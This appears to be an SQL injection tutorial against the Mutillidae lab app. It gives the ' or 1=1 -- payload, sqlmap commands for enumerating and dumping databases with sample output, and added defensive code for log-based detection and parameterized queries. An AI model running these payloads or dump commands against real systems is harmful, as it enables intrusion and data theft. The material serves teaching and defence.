SQL Injection Full Tutorial with Example to Dump Data

SQL Injection (SQLi)

Overview

SQL injection may occur when user- or attacker-controlled input is later incorporated into an SQL query that the web application builds and executes. Web applications that do not separate code from data by using routines (e.g. stored procedures, user-defined functions) may be vulnerable. Some sites parameterize queries, which prevents SQL injection but fails to meet other objectives such as least privilege.



Discovery Methodology

Inject every available parameter of the web page with characters reserved in SQL, PL/SQL, T-SQL, and MySQL. Compare the responses with those returned for normal input. Additionally, attempt to inject valid SQL statements, including statements that cause errors, induce pauses, or produce different responses when otherwise similar statements evaluate to true or false.

Hint: Use Burp Suite and SQLMap to fuzz sites quickly
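A defender-side check for the probing behaviour described above, as an added example (not code from the tutorial): it URL-decodes each query parameter in constructed Apache access-log lines and flags the fingerprints the methodology relies on (a reserved quote followed by a boolean, an SQL comment sequence, a dangling quote that produced a server error), plus a User-Agent in the form of sqlmap's default one, whose exact string is assumed here.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Apache combined format). Lines 2 and 3
# carry the probes the Discovery Methodology describes: the tutorial's own
# "' or 1=1 -- " payload and a lone reserved quote that provokes an error.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /mutillidae/index.php?page=login.php&username=asdf HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /mutillidae/index.php?page=login.php&username=%27%20or%201%3d1%20--%20 HTTP/1.1" 200 9812 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /mutillidae/index.php?page=login.php&username=asdf%27 HTTP/1.1" 500 231 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /mutillidae/index.php?page=user-info.php HTTP/1.1" 200 300 "-" "sqlmap/1.7 (http://sqlmap.org)"',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+) \S+ '
                    r'"[^"]*" "(?P<ua>[^"]*)"$')

# Fingerprints in a URL-decoded parameter value: a quote closing the string
# followed by a boolean operator, an SQL comment sequence or statement
# terminator, or a quote left dangling at the end of the value.
SQLI_RE = re.compile(r"""(?ix)
    ['"]\s*(?:or|and)\b
  | --\s | /\* | ;\s*\w
  | ['"](?:\s|$)
""")

def classify_request(line):
    """Return the reasons a log line looks like SQLi probing ([] if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsable log line"]
    reasons = []
    # Assumed form of sqlmap's default agent string; only the default is caught.
    if m.group("ua").lower().startswith("sqlmap"):
        reasons.append("sqlmap default User-Agent")
    for name, value in parse_qsl(urlsplit(m.group("target")).query,
                                 keep_blank_values=True):
        if SQLI_RE.search(value):
            reasons.append("suspicious value in parameter %r: %r" % (name, value))
    # A 5xx right after a suspicious value is the error signal the methodology
    # looks for; on its own a 500 is too noisy to alert on.
    if reasons and m.group("status").startswith("5"):
        reasons.append("server error following suspicious input")
    return reasons

if __name__ == "__main__":
    for i, entry in enumerate(SAMPLE_LOG):
        print(i, classify_request(entry))
```

The access log does not record POST bodies, so injections sent in a form body like the login request further down need a WAF or application-level log to be seen this way.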

Exploitation

Determine the prefix and suffix needed to make the injected code "fit" syntactically, then add a payload between them. Inject the exploit.

Example: Some pages on the site are vulnerable to

' or 1=1 -- (Note: There is a space on the end of this expression)

Note that some characters which are reserved in databases are also reserved in web servers. If submitting injections directly via an interception proxy like Burp Suite, URL-encode the injection to avoid a syntax error on the web server.

URL-encoded version

%27%20%6f%72%20%31%3d%31%20%2d%2d%20
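The two query-building styles the Overview contrasts, exercised with the tutorial's own payload, as an added example (not code from the tutorial): a throwaway in-memory SQLite table stands in for the application's database, and the encoding helper reproduces the percent-encoded form shown above.

```python
import sqlite3

def make_db():
    """Constructed sample data: a tiny in-memory table standing in for the
    application's user store (not the Mutillidae schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [("admin", "s3cret"), ("asdf", "asdf")])
    return conn

def login_concatenated(conn, username, password):
    """Vulnerable form: the input is pasted into the SQL text, so reserved
    characters in it (quote, comment marker) are parsed as query syntax.
    Returns the usernames the query matched."""
    sql = ("SELECT username FROM accounts WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return sorted(row[0] for row in conn.execute(sql))

def login_parameterized(conn, username, password):
    """Hardened form: the query text is fixed and the input is bound as a
    parameter, so it is only ever compared as a value."""
    sql = "SELECT username FROM accounts WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (username, password)))

def percent_encode_all(text):
    """Encode every byte as %XX, as the tutorial does, so the web server does
    not reject the reserved characters before the application sees them."""
    return "".join("%%%02x" % b for b in text.encode("utf-8"))

if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 -- "   # the tutorial's payload, trailing space included
    print(login_concatenated(db, payload, "wrong"))   # every account: ['admin', 'asdf']
    print(login_parameterized(db, payload, "wrong"))  # nothing matched: []
    print(percent_encode_all(payload))                # %27%20%6f%72%20%31%3d%31%20%2d%2d%20
```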

 

Running SQLMAP Help


./sqlmap.py --help 

./sqlmap.py -hh 

Running SQLMAP "Manually"

./sqlmap.py --url="http://192.168.56.102/mutillidae/index.php?page=login.php" --data="username=asdf&password=asdf&login-php-submit-button=Login" --banner

 

Capturing Request To Pass To SQLMAP

 

Note: Save request to a file such as ~/engagements/sqlmap/login.php.request. The -r switch takes the file path.

 

URL: http://192.168.56.102/mutillidae/index.php?page=login.php

 

Request:

 

POST /mutillidae/index.php?page=login.php HTTP/1.1

Host: 192.168.56.102

User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:17.0) Gecko/20100101 Firefox/17.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

Referer: http://192.168.56.102/mutillidae/index.php?page=login.php

Cookie: showhints=0; PHPSESSID=fik978dbhcujcgdjfc2lg249r4

Content-Type: application/x-www-form-urlencoded

Content-Length: 57

 

username=asdf&password=asdf&login-php-submit-button=Login

 

Running SQLMAP with "auto-parse"

 

./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options>

 

Running SQLMAP with various features

 

./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options>

 

--banner

 

                web server operating system: Windows

                web application technology: PHP 5.4.4, Apache 2.4.2

                back-end DBMS: MySQL 5.0

                banner:    '5.5.25a'

 

--fingerprint

 

                web server operating system: Windows

                web application technology: PHP 5.4.4, Apache 2.4.2

                back-end DBMS: active fingerprint: MySQL >= 5.5.0

 

    --current-user      Retrieve DBMS current user

    --current-db        Retrieve DBMS current database

    --hostname          Retrieve DBMS server hostname

    --is-dba            Detect if the DBMS current user is DBA

 

                current user:    'root@localhost'

                current database:    'nowasp'

                current user is DBA:    True

                hostname:    'mutillid-7se1xr'

 

    --users             Enumerate DBMS users

    --passwords         Enumerate DBMS users password hashes

 

                database management system users

                [*] ''@'localhost'

                [*] 'pma'@'localhost'

                [*] 'root'@'linux'

                [*] 'root'@'localhost'

 

    --dbs               Enumerate DBMS databases

 

                available databases[10]:

                [*] cdcol

                [*] information_schema

                [*] mysql

                [*] nowasp

                [*] owasp10

                [*] owasp13

                [*] performance_schema

                [*] phpmyadmin

                [*] test

                [*] webauth

 

 

Enumerate DBMS database tables, columns, structure (schema)

 

    --tables            Enumerate DBMS database tables

    --columns           Enumerate DBMS database table columns

    --schema            Enumerate DBMS schema

    --count             Retrieve number of entries for table(s)

    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables

    -D DB               DBMS database to enumerate

    -T TBL              DBMS database table to enumerate

    -C COL              DBMS database table column to enumerate

    -U USER             DBMS user to enumerate

 

Extracting data 

    --dump              Dump DBMS database table entries

    --dump-all          Dump all DBMS databases tables entries

    -D DB               DBMS database to enumerate

    -T TBL              DBMS database table to enumerate

    -C COL              DBMS database table column to enumerate

    -U USER             DBMS user to enumerate

    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables

    --start=LIMITSTART  First query output entry to retrieve

    --stop=LIMITSTOP    Last query output entry to retrieve

    --sql-query=QUERY   SQL statement to be executed

    --sql-shell         Prompt for an interactive SQL shell

 

Listing columns from tables

./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --columns

./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --common-columns

./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select column_name from information_schema.columns where table_name = 'user'"

 

                select column_name from information_schema.columns where table_name = 'user' [42]:

                                [*] Alter_priv

                                [*] Alter_routine_priv

                                [*] authentication_string

                                [*] Create_priv

                                [*] Create_routine_priv

                                [*] Create_tablespace_priv

                                [*] Create_tmp_table_priv

                                [*] Create_user_priv

                                [*] Create_view_priv

                                [*] Delete_priv

                                [*] Drop_priv

                                [*] Event_priv

                                [*] Execute_priv

                                [*] File_priv

                                [*] Grant_priv

                                [*] Host

                                [*] Index_priv

                                [*] Insert_priv

                                [*] Lock_tables_priv

                                [*] max_connections

                                [*] max_questions

                                [*] max_updates

                                [*] max_user_connections

                                [*] Password

                                [*] plugin

                                [*] Process_priv

                                [*] References_priv

                                [*] Reload_priv

                                [*] Repl_client_priv

                                [*] Repl_slave_priv

                                [*] Select_priv

                                [*] Show_db_priv

                                [*] Show_view_priv

                                [*] Shutdown_priv

                                [*] ssl_cipher

                                [*] ssl_type

                                [*] Super_priv

                                [*] Trigger_priv

                                [*] Update_priv

                                [*] User

                                [*] x509_issuer

                                [*] x509_subject

 

 

Disclaimer

This tutorial is only for Educational purpose. Don't harm anyone.
